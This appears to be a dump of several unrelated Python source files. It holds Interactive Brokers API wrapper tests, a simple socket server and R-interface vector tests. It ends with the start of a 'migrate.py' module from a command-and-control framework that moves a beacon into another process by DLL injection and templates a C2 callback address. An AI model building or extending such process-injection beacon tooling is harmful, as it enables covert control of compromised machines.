except error.IBError:
self.fail("IBError raised unexpectedly.")
@utils.async_test
async def test_get_request_queue_1(self):
"""Test getter `get_request_queue`.
* Queue associated with ID 1 has already been initialised and available
for reuse. Should return the same `FinishableQueue` instance.
"""
# Prepare queue with request ID 1
queue = self._wrapper.get_request_queue(req_id=1)
queue.put(element=fq.Status.FINISHED)
await queue.get()
# Should return the same `FinishableQueue` instance for reuse
self.assertEqual(self._wrapper.get_request_queue(req_id=1), queue)
def test_get_request_queue_err(self):
"""Test getter `get_request_queue` for error case.
* Queue associated with ID 1 has already been initialised and NOT
ready for reuse. Should raise exception `IBError`.
"""
# Prepare queue with request ID 1
self._wrapper.get_request_queue(req_id=1)
# Expect exception `IBError`
with self.assertRaises(error.IBError):
self._wrapper.get_request_queue(req_id=1)
def test_get_request_queue_no_throw_0(self):
"""Test getter `get_request_queue_no_throw`.
* No queue has been initialised before. Should return `None`.
"""
self.assertEqual(self._wrapper.get_request_queue_no_throw(req_id=1),
None)
def test_get_request_queue_no_throw_1(self):
"""Test getter `get_request_queue_no_throw`.
* Queue associated with ID 1 has already been initialised. Should
return the same `FinishableQueue` instance even if it's not ready for
reuse yet.
"""
# Prepare queue with request ID 1
queue = self._wrapper.get_request_queue(req_id=1)
# Expect the same `FinishableQueue` instance.
self.assertEqual(self._wrapper.get_request_queue_no_throw(req_id=1),
queue)
class TestAccountAndPortfolio(unittest.TestCase):
"""Unit tests for account and portfolio data related functions in
`IBWrapper`.
Connection with IB is NOT required.
"""
def setUp(self):
self._delegate = utils.MockAccountsManagementDelegate()
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=self._delegate,
orders_manager=manager.OrdersManager()
)
def test_managed_accounts(self):
"""Test overridden function `managedAccounts`."""
# Mock accounts list received from IB
acc_1 = "DU0000140"
acc_2 = "DU0000141"
# IB accounts list format "DU0000140,DU0000141,..."
self._wrapper.managedAccounts(accountsList=f"{acc_1},{acc_2}")
# Expect instances of model `Accounts` for `acc_1` & `acc_2`
# to be stored in the `AccountsManagementDelegate` instance.
self.assertTrue(self._delegate.accounts)
self.assertTrue(acc_1 in self._delegate.accounts)
self.assertTrue(acc_2 in self._delegate.accounts)
@utils.async_test
async def test_update_account_value(self):
"""Test overridden function `updateAccountValue`."""
# Mock account value data received from IB
self._wrapper.updateAccountValue(
key="AvailableFunds", val="890622.47",
currency="USD", accountName="DU0000140"
)
self._delegate.account_updates_queue.put(element=fq.Status.FINISHED)
result = await self._delegate.account_updates_queue.get()
# Expect instance of `RawAccountValueData` in `account_updates_queue`
self.assertIsInstance(result[0], models.RawAccountValueData)
@utils.async_test
async def test_update_portfolio(self):
"""Test overridden function `updatePortfolio`."""
# Mock portfolio data received from IB
self._wrapper.updatePortfolio(
contract=sample_contracts.gbp_usd_fx(), position=1000,
marketPrice=1.38220, marketValue=1382.2, averageCost=1.33327,
unrealizedPNL=48.93, realizedPNL=0, accountName="DU0000140"
)
self._delegate.account_updates_queue.put(element=fq.Status.FINISHED)
results = await self._delegate.account_updates_queue.get()
# Expect instance of `RawPortfolioData` in `account_updates_queue`
self.assertIsInstance(results[0], models.RawPortfolioData)
@utils.async_test
async def test_update_account_time(self):
"""Test overridden function `updateAccountTime`."""
# Mock last update system time received from IB
time = "09:30"
self._wrapper.updateAccountTime(timeStamp=time)
self._delegate.account_updates_queue.put(element=fq.Status.FINISHED)
results = await self._delegate.account_updates_queue.get()
# Expect data stored as-is in `account_updates_queue`
self.assertEqual(results[0], time)
class TestOrder(unittest.TestCase):
"""Unit tests for IB order related functions & properties in `IBWrapper`.
Connection with IB is REQUIRED.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
def setUp(self):
self._orders_manager = self._wrapper.orders_manager
@utils.async_test
async def test_open_order(self):
"""Test overridden function `openOrder`."""
order_id = await self._client.req_next_order_id()
self._client.placeOrder(
orderId=order_id, contract=sample_contracts.gbp_usd_fx(),
order=sample_orders.mkt(order_id=order_id,
action=datatype.OrderAction.BUY)
)
await asyncio.sleep(1)
self.assertTrue(order_id in self._orders_manager.open_orders)
@utils.async_test
async def test_open_order_end(self):
"""Test overridden function `openOrderEnd`."""
queue = self._wrapper.get_request_queue(req_id=_global.IDX_OPEN_ORDERS)
self._client.reqOpenOrders()
await queue.get()
self.assertTrue(queue.finished)
@utils.async_test
async def test_order_status(self):
"""Test overridden function `orderStatus`."""
order_id = await self._client.req_next_order_id()
self._client.placeOrder(
orderId=order_id, contract=sample_contracts.gbp_usd_fx(),
order=sample_orders.mkt(order_id=order_id,
action=datatype.OrderAction.SELL)
)
await asyncio.sleep(1)
self.assertTrue(self._orders_manager.open_orders[order_id].exec_rec)
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
class TestContract(unittest.TestCase):
"""Unit tests for IB contract related functions in `IBWrapper`.
Connection with IB is REQUIRED.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
@utils.async_test
async def test_contract_details(self):
"""Test overridden function `contractDetails`.
* `contractDetailsEnd` will be invoked after `contractDetails`.
"""
req_id = self._wrapper.next_req_id
queue = self._wrapper.get_request_queue(req_id)
self._client.reqContractDetails(reqId=req_id,
contract=sample_contracts.gbp_usd_fx())
await asyncio.sleep(0.5)
result = await queue.get()
self.assertTrue(result) # Expect item from queue
# Expect the resolved `ContractDetails` object to be returned
self.assertIsInstance(result[0], contract.ContractDetails)
@utils.async_test
async def test_contract_details_end(self):
"""Test overridden function `contractDetailsEnd`."""
req_id = self._wrapper.next_req_id
queue = self._wrapper.get_request_queue(req_id)
self._wrapper.contractDetailsEnd(reqId=req_id)
await queue.get()
self.assertTrue(queue.finished) # Expect the queue to be marked as FINISHED
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
class TestHistoricalData(unittest.TestCase):
"""Unit tests for historical market data related functions in `IBWrapper`.
Connection with IB is REQUIRED.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
def setUp(self):
self._req_id = self._wrapper.next_req_id
self._queue = self._wrapper.get_request_queue(req_id=self._req_id)
@utils.async_test
async def test_head_timestamp(self):
"""Test overridden function `headTimestamp`."""
timestamp = "1110342600" # Unix timestamp
# Mock timestamp received from IB
self._wrapper.headTimestamp(reqId=self._req_id, headTimestamp=timestamp)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
self.assertEqual(result[0], timestamp) # Expect data received as-is
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@utils.async_test
async def test_historical_ticks(self):
"""Test overridden function `historicalTicks`."""
end = (datetime.datetime.now().astimezone(_global.TZ)
.strftime(_global.TIME_FMT))
self._client.reqHistoricalTicks(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
startDateTime="", endDateTime=end, numberOfTicks=1000,
whatToShow=datatype.HistoricalTicks.MIDPOINT.value, useRth=1,
ignoreSize=False, miscOptions=[]
)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
# Expect `ListOfHistoricalTick` to be sent to the queue
self.assertIsInstance(result[0], wrapper.ListOfHistoricalTick)
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@utils.async_test
async def test_historical_ticks_bid_ask(self):
"""Test overridden function `historicalTicksBidAsk`."""
end = (datetime.datetime.now().astimezone(_global.TZ)
.strftime(_global.TIME_FMT))
self._client.reqHistoricalTicks(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
startDateTime="", endDateTime=end, numberOfTicks=1000,
whatToShow=datatype.HistoricalTicks.BID_ASK.value, useRth=1,
ignoreSize=False, miscOptions=[]
)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
        # Expect `ListOfHistoricalTickBidAsk` to be sent to the queue
self.assertIsInstance(result[0], wrapper.ListOfHistoricalTickBidAsk)
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@utils.async_test
async def test_historical_ticks_last(self):
"""Test overridden function `historicalTicksLast`."""
end = (datetime.datetime.now().astimezone(_global.TZ)
.strftime(_global.TIME_FMT))
self._client.reqHistoricalTicks(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
startDateTime="", endDateTime=end, numberOfTicks=1000,
whatToShow=datatype.HistoricalTicks.TRADES.value, useRth=1,
ignoreSize=False, miscOptions=[]
)
result = await self._queue.get()
self.assertTrue(result) # Expect item from queue
        # Expect `ListOfHistoricalTickLast` to be sent to the queue
self.assertIsInstance(result[0], wrapper.ListOfHistoricalTickLast)
# Expect queue to be marked as FINISHED
self.assertTrue(self._queue.finished)
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
class TestTickByTickData(unittest.TestCase):
"""Unit tests for Tick-by-Tick data related functions in `IBWrapper`.
Connection with IB is REQUIRED.
* Tests in this suit will hang up when the market is closed.
* Subscription of US Futures market data is REQUIRED for some tests.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
cls._client = _client.IBClient(cls._wrapper)
cls._client.connect(utils.IB_HOST, utils.IB_PORT, utils.IB_CLIENT_ID)
thread = threading.Thread(target=cls._client.run)
thread.start()
def setUp(self):
self._received = False # Indicates if tick received
self._req_id = self._wrapper.next_req_id
self._queue = self._wrapper.get_request_queue(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_all_last_0(self):
"""Test overridden function `tickByTickAllLast` with tick type `Last`.
"""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.us_future(),
tickType=datatype.LiveTicks.LAST.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
# Expect `HistoricalTickLast` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTickLast)
await self._stop_streaming(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_all_last_1(self):
"""Test overridden function `tickByTickAllLast` with tick type
`AllLast`.
"""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.us_future(),
tickType=datatype.LiveTicks.ALL_LAST.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
# Expect `HistoricalTickLast` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTickLast)
await self._stop_streaming(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_bid_ask(self):
"""Test overridden function `tickByTickBidAsk`."""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
tickType=datatype.LiveTicks.BID_ASK.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
                # Expect `HistoricalTickBidAsk` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTickBidAsk)
await self._stop_streaming(req_id=self._req_id)
@utils.async_test
async def test_tick_by_tick_mid_point(self):
"""Test overridden function `tickByTickMidPoint`."""
self._client.reqTickByTickData(
reqId=self._req_id, contract=sample_contracts.gbp_usd_fx(),
tickType=datatype.LiveTicks.MIDPOINT.value, numberOfTicks=0,
ignoreSize=True
)
async for elem in self._queue.stream():
if elem is fq.Status.FINISHED:
continue # Let the async task finish
if not self._received:
                # Expect `HistoricalTick` to be sent to queue
self.assertIsInstance(elem, wrapper.HistoricalTick)
await self._stop_streaming(req_id=self._req_id)
@classmethod
def tearDownClass(cls):
cls._client.disconnect()
async def _stop_streaming(self, req_id: int):
self._received = True
self._client.cancelTickByTickData(reqId=req_id)
await asyncio.sleep(2)
self._queue.put(element=fq.Status.FINISHED)
|
server.py
|
#!/usr/bin/env python
import socket
from threading import Thread
HOST = 'localhost'
PORT = 12345
BUFSIZE = 2014
def client_handle(client_socket):
client_info = str(client_socket.getpeername())
print "Got connection from %s" % client_info
while True:
data = client_socket.recv(BUFSIZE)
        if not data:
            # an empty recv means the client closed the connection, so stop handling it
            break
else:
print data
# admin_message = raw_input('admin says: ')
# if admin_message:
# client_socket.sendall('admin says: ' + admin_message)
# else:
# client_socket.sendall('message received!')
client_socket.sendall('message received from %s!' % client_info)
print 'close %s connection.' % client_info
# client_socket.close()
# define socket type, TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set options on the socket.
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST, PORT))
sock.listen(10)
while True:
print 'waiting for connection...'
try:
client_sock, client_addr = sock.accept()
except (KeyboardInterrupt, SystemExit):
raise
except Exception, e:
print 'exception: ', e
continue
t = Thread(target=client_handle, args=[client_sock])
t.setDaemon(1)
t.start()
|
test_SexpVector.py
|
import unittest
import sys
import rpy3.rinterface as ri
ri.initr()
def evalr(string):
rstring = ri.StrSexpVector((string, ))
res = ri.baseenv["parse"](text = rstring)
res = ri.baseenv["eval"](res)
return res
def floatEqual(x, y, epsilon = 0.00000001):
return abs(x - y) < epsilon
class WrapperSexpVectorTestCase(unittest.TestCase):
def testInt(self):
sexp = ri.IntSexpVector([1, ])
isInteger = ri.globalenv.get("is.integer")
ok = isInteger(sexp)[0]
self.assertTrue(ok)
def testFloat(self):
        sexp = ri.FloatSexpVector([1.0, ])
isNumeric = ri.globalenv.get("is.numeric")
ok = isNumeric(sexp)[0]
self.assertTrue(ok)
def testStr(self):
sexp = ri.StrSexpVector(["a", ])
isStr = ri.globalenv.get("is.character")
ok = isStr(sexp)[0]
self.assertTrue(ok)
def testBool(self):
sexp = ri.BoolSexpVector([True, ])
isBool = ri.globalenv.get("is.logical")
ok = isBool(sexp)[0]
self.assertTrue(ok)
def testComplex(self):
sexp = ri.ComplexSexpVector([1+2j, ])
is_complex = ri.globalenv.get("is.complex")
ok = is_complex(sexp)[0]
self.assertTrue(ok)
class NAValuesTestCase(unittest.TestCase):
def testRtoNAInteger(self):
na_int = ri.NAIntegerType()
r_na_int = evalr("NA_integer_")[0]
self.assertTrue(r_na_int is na_int)
def testNAIntegertoR(self):
na_int = ri.NAIntegerType()
self.assertEquals(True, ri.baseenv["is.na"](na_int)[0])
def testNAIntegerBinaryfunc(self):
na_int = ri.NAIntegerType()
self.assertTrue((na_int + 2) is na_int)
def testNAIntegerInVector(self):
na_int = ri.NAIntegerType()
x = ri.IntSexpVector((1, na_int, 2))
self.assertTrue(x[1] is na_int)
self.assertEquals(1, x[0])
self.assertEquals(2, x[2])
def testNAIntegerRepr(self):
na_int = ri.NAIntegerType()
self.assertEquals("NA_integer_", repr(na_int))
def testRtoNALogical(self):
na_lgl = ri.NALogicalType()
r_na_lgl = evalr("NA")[0]
self.assertTrue(r_na_lgl is na_lgl)
def testNALogicaltoR(self):
na_lgl = ri.NALogicalType()
self.assertEquals(True, ri.baseenv["is.na"](na_lgl)[0])
def testNALogicalInVector(self):
na_bool = ri.NALogicalType()
x = ri.BoolSexpVector((True, na_bool, False))
self.assertTrue(x[1] is na_bool)
self.assertEquals(True, x[0])
self.assertEquals(False, x[2])
    def testNALogicalRepr(self):
na_bool = ri.NALogicalType()
self.assertEquals("NA", repr(na_bool))
def testRtoNAReal(self):
na_real = ri.NARealType()
r_na_real = evalr("NA_real_")[0]
self.assertTrue(r_na_real is na_real)
def testNARealtoR(self):
na_real = ri.NARealType()
self.assertEquals(True, ri.baseenv["is.na"](na_real)[0])
def testNARealBinaryfunc(self):
na_real = ri.NARealType()
self.assertTrue((na_real + 2.0) is na_real)
def testNARealInVector(self):
na_float = ri.NARealType()
x = ri.FloatSexpVector((1.1, na_float, 2.2))
self.assertTrue(x[1] is na_float)
self.assertEquals(1.1, x[0])
self.assertEquals(2.2, x[2])
def testNARealRepr(self):
na_float = ri.NARealType()
self.assertEquals("NA_real_", repr(na_float))
def testRtoNACharacter(self):
na_character = ri.NACharacterType()
r_na_character = evalr("NA_character_")[0]
self.assertTrue(r_na_character is na_character)
def testNACharactertoR(self):
na_character = ri.NACharacterType()
self.assertEquals(True, ri.baseenv["is.na"](ri.StrSexpVector((na_character, )))[0])
def testNACharacterInVector(self):
na_str = ri.NACharacterType()
x = ri.StrSexpVector(("ab", na_str, "cd"))
self.assertTrue(x[1] is na_str)
self.assertEquals("ab", x[0])
self.assertEquals("cd", x[2])
def testNACharacterRepr(self):
na_str = ri.NACharacterType()
self.assertEquals("NA_character_", repr(na_str))
class SexpVectorTestCase(unittest.TestCase):
    def testMissingType(self):
self.assertRaises(ValueError, ri.SexpVector, [2, ])
    #FIXME: ending R and initializing it again currently causes a lot of trouble...
def testNewWithoutInit(self):
if sys.version_info[0] == 2 and sys.version_info[1] < 6:
self.assertTrue(False) # cannot be tested with Python < 2.6
return None
import multiprocessing
def foo(queue):
import rpy3.rinterface as rinterface
rinterface.endr(1)
try:
tmp = ri.SexpVector([1,2], ri.INTSXP)
res = (False, None)
except RuntimeError, re:
res = (True, re)
except Exception, e:
res = (False, e)
queue.put(res)
q = multiprocessing.Queue()
p = multiprocessing.Process(target = foo, args = (q,))
p.start()
res = q.get()
p.join()
self.assertTrue(res[0])
def testNewBool(self):
sexp = ri.SexpVector([True, ], ri.LGLSXP)
isLogical = ri.globalenv.get("is.logical")
ok = isLogical(sexp)[0]
self.assertTrue(ok)
self.assertTrue(sexp[0])
sexp = ri.SexpVector(["a", ], ri.LGLSXP)
isLogical = ri.globalenv.get("is.logical")
ok = isLogical(sexp)[0]
self.assertTrue(ok)
self.assertTrue(sexp[0])
def testNewInt(self):
sexp = ri.SexpVector([1, ], ri.INTSXP)
isInteger = ri.globalenv.get("is.integer")
ok = isInteger(sexp)[0]
self.assertTrue(ok)
sexp = ri.SexpVector(["a", ], ri.INTSXP)
isNA = ri.globalenv.get("is.na")
ok = isNA(sexp)[0]
self.assertTrue(ok)
def testNewReal(self):
sexp = ri.SexpVector([1.0, ], ri.REALSXP)
isNumeric = ri.globalenv.get("is.numeric")
ok = isNumeric(sexp)[0]
self.assertTrue(ok)
sexp = ri.SexpVector(["a", ], ri.REALSXP)
isNA = ri.globalenv.get("is.na")
ok = isNA(sexp)[0]
self.assertTrue(ok)
def testNewComplex(self):
sexp = ri.SexpVector([1.0 + 1.0j, ], ri.CPLXSXP)
isComplex = ri.globalenv.get("is.complex")
ok = isComplex(sexp)[0]
self.assertTrue(ok)
def testNewString(self):
sexp = ri.SexpVector(["abc", ], ri.STRSXP)
isCharacter = ri.globalenv.get("is.character")
ok = isCharacter(sexp)[0]
self.assertTrue(ok)
sexp = ri.SexpVector([1, ], ri.STRSXP)
isCharacter = ri.globalenv.get("is.character")
ok = isCharacter(sexp)[0]
self.assertTrue(ok)
def testNewUnicode(self):
sexp = ri.SexpVector([u'abc', ], ri.STRSXP)
isCharacter = ri.globalenv.get("is.character")
ok = isCharacter(sexp)[0]
self.assertTrue(ok)
self.assertEquals('abc', sexp[0])
def testNewList(self):
vec = ri.ListSexpVector([1,'b',3,'d',5])
ok = ri.baseenv["is.list"](vec)[0]
self.assertTrue(ok)
self.assertEquals(5, len(vec))
self.assertEquals(1, vec[0][0])
self.assertEquals('b', vec[1][0])
def testNewVector(self):
sexp_char = ri.SexpVector(["abc", ],
ri.STRSXP)
sexp_int = ri.SexpVector([1, ],
ri.INTSXP)
sexp = ri.SexpVector([sexp_char, sexp_int],
ri.VECSXP)
isList = ri.globalenv.get("is.list")
ok = isList(sexp)[0]
self.assertTrue(ok)
self.assertEquals(2, len(sexp))
def testNew_InvalidType_NotAType(self):
self.assertRaises(ValueError, ri.SexpVector, [1, ], -1)
self.assertRaises(ValueError, ri.SexpVector, [1, ], 250)
def testNew_InvalidType_NotAVectorType(self):
self.assertRaises(ValueError, ri.SexpVector, [1, ], ri.ENVSXP)
def testNew_InvalidType_NotASequence(self):
self.assertRaises(ValueError, ri.SexpVector, 1, ri.INTSXP)
def testGetItem(self):
letters_R = ri.globalenv.get("letters")
self.assertTrue(isinstance(letters_R, ri.SexpVector))
letters = (('a', 0), ('b', 1), ('c', 2),
('x', 23), ('y', 24), ('z', 25))
for l, i in letters:
self.assertTrue(letters_R[i] == l)
Rlist = ri.globalenv.get("list")
seq_R = ri.globalenv.get("seq")
mySeq = seq_R(ri.SexpVector([0, ], ri.INTSXP),
ri.SexpVector([10, ], ri.INTSXP))
myList = Rlist(s=mySeq, l=letters_R)
idem = ri.globalenv.get("identical")
self.assertTrue(idem(mySeq, myList[0]))
self.assertTrue(idem(letters_R, myList[1]))
letters_R = ri.globalenv.get("letters")
self.assertEquals('z', letters_R[-1])
def testGetItemLang(self):
formula = ri.baseenv.get('formula')
f = formula(ri.StrSexpVector(['y ~ x', ]))
y = f[0]
self.assertEquals(ri.SYMSXP, y.typeof)
def testGetItemExpression(self):
expression = ri.baseenv.get('expression')
e = expression(ri.StrSexpVector(['a', ]),
ri.StrSexpVector(['b', ]))
y = e[0]
self.assertEquals(ri.STRSXP, y.typeof)
def testGetItemPairList(self):
pairlist = ri.baseenv.get('pairlist')
pl = pairlist(a = ri.StrSexpVector([1, ]))
y = pl[0]
self.assertEquals(ri.LISTSXP, y.typeof)
def testGetItemNegativeOutOfBound(self):
letters_R = ri.globalenv.get("letters")
self.assertRaises(IndexError, letters_R.__getitem__,
-100)
def testGetItemOutOfBound(self):
myVec = ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP)
self.assertRaises(IndexError, myVec.__getitem__, 10)
if (sys.maxint > ri.R_LEN_T_MAX):
self.assertRaises(IndexError, myVec.__getitem__,
ri.R_LEN_T_MAX+1)
def testGetSliceFloat(self):
vec = ri.FloatSexpVector([1.0,2.0,3.0])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1.0, vec[0])
self.assertEquals(2.0, vec[1])
def testGetSliceInt(self):
vec = ri.IntSexpVector([1,2,3])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1, vec[0])
self.assertEquals(2, vec[1])
def testGetSliceIntNegative(self):
vec = ri.IntSexpVector([1,2,3])
vec = vec[-2:-1]
self.assertEquals(1, len(vec))
self.assertEquals(2, vec[0])
def testGetSliceBool(self):
vec = ri.BoolSexpVector([True,False,True])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(True, vec[0])
self.assertEquals(False, vec[1])
def testGetSliceStr(self):
vec = ri.StrSexpVector(['a','b','c'])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals('a', vec[0])
self.assertEquals('b', vec[1])
def testGetSliceComplex(self):
vec = ri.ComplexSexpVector([1+2j,2+3j,3+4j])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1+2j, vec[0])
self.assertEquals(2+3j, vec[1])
def testGetSliceList(self):
vec = ri.ListSexpVector([1,'b',True])
vec = vec[0:2]
self.assertEquals(2, len(vec))
self.assertEquals(1, vec[0][0])
self.assertEquals('b', vec[1][0])
def testAssignItemDifferentType(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP))
self.assertRaises(ValueError, myVec.__setitem__, 0,
ri.SexpVector(["a", ], ri.STRSXP))
def testAssignItemOutOfBound(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP))
self.assertRaises(IndexError, myVec.__setitem__, 10,
ri.SexpVector([1, ], ri.INTSXP))
def testAssignItemInt(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0, 1, 2, 3, 4, 5], ri.INTSXP))
myVec[0] = ri.SexpVector([100, ], ri.INTSXP)
self.assertTrue(myVec[0] == 100)
myVec[3] = ri.SexpVector([100, ], ri.INTSXP)
self.assertTrue(myVec[3] == 100)
myVec[-1] = ri.SexpVector([200, ], ri.INTSXP)
self.assertTrue(myVec[5] == 200)
def testAssignItemReal(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([0.0, 1.0, 2.0, 3.0, 4.0, 5.0],
ri.REALSXP))
myVec[0] = ri.SexpVector([100.0, ], ri.REALSXP)
self.assertTrue(floatEqual(myVec[0], 100.0))
myVec[3] = ri.SexpVector([100.0, ], ri.REALSXP)
self.assertTrue(floatEqual(myVec[3], 100.0))
def testAssignItemLogical(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([True, False, True, True, False],
ri.LGLSXP))
myVec[0] = ri.SexpVector([False, ], ri.LGLSXP)
self.assertFalse(myVec[0])
myVec[3] = ri.SexpVector([False, ], ri.LGLSXP)
self.assertFalse(myVec[3])
def testAssignItemComplex(self):
c_R = ri.globalenv.get("c")
myVec = c_R(ri.SexpVector([1.0+2.0j, 2.0+2.0j, 3.0+2.0j,
4.0+2.0j, 5.0+2.0j],
ri.CPLXSXP))
myVec[0] = ri.SexpVector([100.0+200.0j, ], ri.CPLXSXP)
self.assertTrue(floatEqual(myVec[0].real, 100.0))
self.assertTrue(floatEqual(myVec[0].imag, 200.0))
myVec[3] = ri.SexpVector([100.0+200.0j, ], ri.CPLXSXP)
self.assertTrue(floatEqual(myVec[3].real, 100.0))
self.assertTrue(floatEqual(myVec[3].imag, 200.0))
def testAssignItemList(self):
myVec = ri.SexpVector([ri.StrSexpVector(["a", ]),
ri.IntSexpVector([1, ]),
ri.IntSexpVector([3, ])],
ri.VECSXP)
myVec[0] = ri.SexpVector([ri.FloatSexpVector([100.0, ]), ],
ri.VECSXP)
self.assertTrue(floatEqual(myVec[0][0][0], 100.0))
myVec[2] = ri.SexpVector([ri.StrSexpVector(["a", ]), ],
ri.VECSXP)
self.assertTrue(myVec[2][0][0] == "a")
def testAssignItemString(self):
letters_R = ri.SexpVector("abcdefghij", ri.STRSXP)
self.assertRaises(ValueError, letters_R.__setitem__, 0,
ri.SexpVector([1, ],
ri.INTSXP))
letters_R[0] = ri.SexpVector(["z", ], ri.STRSXP)
self.assertTrue(letters_R[0] == "z")
def testSetSliceFloat(self):
vec = ri.FloatSexpVector([1.0,2.0,3.0])
vec[0:2] = ri.FloatSexpVector([11.0, 12.0])
self.assertEquals(3, len(vec))
self.assertEquals(11.0, vec[0])
self.assertEquals(12.0, vec[1])
self.assertEquals(3.0, vec[2])
def testSetSliceInt(self):
vec = ri.IntSexpVector([1,2,3])
vec[0:2] = ri.IntSexpVector([11,12])
self.assertEquals(3, len(vec))
self.assertEquals(11, vec[0])
self.assertEquals(12, vec[1])
def testSetSliceIntNegative(self):
vec = ri.IntSexpVector([1,2,3])
vec[-2:-1] = ri.IntSexpVector([33,])
self.assertEquals(3, len(vec))
self.assertEquals(33, vec[1])
def testSetSliceBool(self):
vec = ri.BoolSexpVector([True,False,True])
vec[0:2] = ri.BoolSexpVector([False, False])
self.assertEquals(3, len(vec))
self.assertEquals(False, vec[0])
self.assertEquals(False, vec[1])
def testSetSliceStr(self):
vec = ri.StrSexpVector(['a','b','c'])
vec[0:2] = ri.StrSexpVector(['d','e'])
self.assertEquals(3, len(vec))
self.assertEquals('d', vec[0])
self.assertEquals('e', vec[1])
def testSetSliceComplex(self):
vec = ri.ComplexSexpVector([1+2j,2+3j,3+4j])
vec[0:2] = ri.ComplexSexpVector([11+2j,12+3j])
self.assertEquals(3, len(vec))
self.assertEquals(11+2j, vec[0])
self.assertEquals(12+3j, vec[1])
def testSetSliceList(self):
vec = ri.ListSexpVector([1,'b',True])
vec[0:2] = ri.ListSexpVector([False, 2])
self.assertEquals(3, len(vec))
self.assertEquals(False, vec[0][0])
self.assertEquals(2, vec[1][0])
def testMissingRPreserveObjectBug(self):
rgc = ri.baseenv['gc']
xx = range(100000)
x = ri.SexpVector(xx, ri.INTSXP)
rgc()
self.assertEquals(0, x[0])
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(SexpVectorTestCase)
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(WrapperSexpVectorTestCase))
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(NAValuesTestCase))
return suite
if __name__ == '__main__':
tr = unittest.TextTestRunner(verbosity = 2)
tr.run(suite())
|
migrate.py
|
#
# Migrate the current beacon to a different process
#
import os
import json
import base64
import argparse
import threading
from lib import buildtools
__description__ = "Migrate a beacon to a different process"
__author__ = "@_batsec_"
__type__ = "process"
# identify the task as a dll injection
DLLINJECT_EXEC_ID = 0x5000
# did the command error
ERROR = False
error_list = ""
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message is not None:
print(message)
def build_inject_info(args, rcode):
# create the json object to tell the beacon
# where to execute the code.
info = {}
info["pid"] = int(args.pid)
info["dll"] = rcode
return json.dumps(info)
def generate_beacon_code(shad0w):
buildtools.clone_source_files(rootdir='injectable')
settings_template = """#define _C2_CALLBACK_ADDRESS L"%s"
